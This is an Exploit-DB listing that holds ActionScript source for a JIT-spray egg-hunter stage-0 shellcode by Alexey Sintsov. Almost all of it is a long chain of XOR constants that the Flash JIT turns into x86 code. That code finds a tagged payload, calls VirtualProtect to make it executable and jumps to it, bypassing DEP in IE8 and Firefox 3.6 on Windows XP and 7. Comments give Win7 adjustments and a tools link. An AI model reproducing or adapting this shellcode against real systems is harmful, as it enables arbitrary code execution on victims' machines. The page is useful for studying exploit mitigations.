JITed egg-hunter stage-0 shellcode



EDB-ID: 13645 CVE: N/A OSVDB-ID: N/A
Author: Alexey Sintsov Published: 2010-03-20 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
// JITed egg-hunter stage-0 shellcode
//      (Permanent DEP bypass)
//
//      By Alexey Sintsov
// dookie@inbox.ru
// a.sintsov@dsec.ru
//
// DSecRG - Digital Security Research Group [dsecrg.com]//
//
//      TAG=3135330731353307
//                  its mean 0x07333531 twice!
//
//
//      This version is more universal than old STAGE-0 (that have use Flash Dictionary addr leakage)
//
//
//      Example of usage and tools for modify:  http://www.dsecrg.com/files/pub/tools/JIT.zip
//
//      Find shellcode by TAG          - need time ))
//      Find VirtualProtect address
//      Mark shellcode mem as executable
//      Jump on it...
//  
//
//      Tested on Windows XP SP3/SP2, Windows 7: IE8, FF3.6 
//
//      For Win7 make differ from comments
//      it's needed cos used skape (mmiller@hick.org) shellcode (NtDisplayString)
//      
//       

package {
    import flash.display.*
 public class Loadzz2 extends MovieClip
    {
  function funcXOR1()
  {
   var jit=(0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^
   0x3c58d231^
   0x3cffca80^
   0x3c0fce80^
   0x3c429090^
   0x3c436a52^ //0x3c6d6a52 for Win7
   0x3c2ecd58^
   0x6a90053c^
   0x6a905a5a^
   0x3c90d874^
   0x31b85959^
   0x3c900733^
   0x6aaffa8b^
   0x6aafd175^
   0x6a595990^
   0x3c57c775^
   0x3c44ec83^
   0x3c90C033^
   0x3c9030b0^
   0x3c008b64^
   0x3c0c408b^
   0x3c1c408b^
   0x3c08508b^
   0x3c20788b^
   0x3c90008b^
   0x6a6b3f80^
   0x3c90eA75^
   0x3c904747^
   0x6a653f80^
   0x3c90ef75^
   0x3c904747^
   0x6a723f80^
   0x3c90ef75^
   0x3c904747^
   0x6a6e3f80^
   0x3c90ef75^
   0x3c529090^
   0x3c3cc283^
   0x3c903a8b^
   0x3c24148b^
   0x3c90d703^
   0x3c78c283^
   0x3c903a8b^
   0x3c24148b^
   0x3c90d703^
   0x3c18c283^
   0x3c903a8b^
   0x3c04c283^
   0x3c901a8b^
   0x3c241c03^
   0x3c04c283^
   0x3c90328b^
   0x3c243403^
   0x3c04c283^
   0x3c900a8b^
   0x3c240c03^
   0x3cb89090^
   0x3c900000^
   0x3c9063b0^
   0x3c5074b4^
   0x3cb89090^
   0x3c906574^
   0x3c9072b0^
   0x3c506fb4^
   0x3cb89090^
   0x3c90506c^
   0x3c9075b0^
   0x3c5061b4^
   0x3cb89090^
   0x3c907472^
   0x3c9056b0^
   0x3c5069b4^
   0x3c90d78b^
   0x3c90C033^
   0x3c90ff33^
   0x3c535156^
   0x3c909090^
   0x3c909090^
   0x3c574790^
   0x3c24048b^
   0x3c02e0c1^
   0x3c90f003^
   0x3c90068b^
   0x3c20c483^
   0x3c240403^
   0x3c20ec83^
   0x3c90c933^
   0x3c900eb1^
   0x3c10c483^
   0x3c90f48b^
   0x3c90f88b^
   0x3c18c483^
   0x6a90a6f3^
   0x14901474^
   0x3c24ec83^
   0x3c595b5f^
   0x3c90905e^
   0x3c9090eb^
   0x3c24ec83^
   0x3c595b5f^
   0x3c90905e^
   0x3c90e7d1^
   0x3c90cf03^
   0x3c90c033^
   0x3c018b66^
   0x3c02e0c1^
   0x3c90c303^
   0x3c90188b^
   0x3c10c483^
   0x3c241c03^
   0x3c5cc483^ // for Win7 0x3c60c483
   0x3c90905F^
   0x3c406a54^
   0x3c90016a^
   0x3cd3ff57^
   0x3c90e7ff^
   0x3ccccccc);
   return jit;
  }
  
  function Loadzz2()
  {
    var ret1=funcXOR1();
  }
    }
}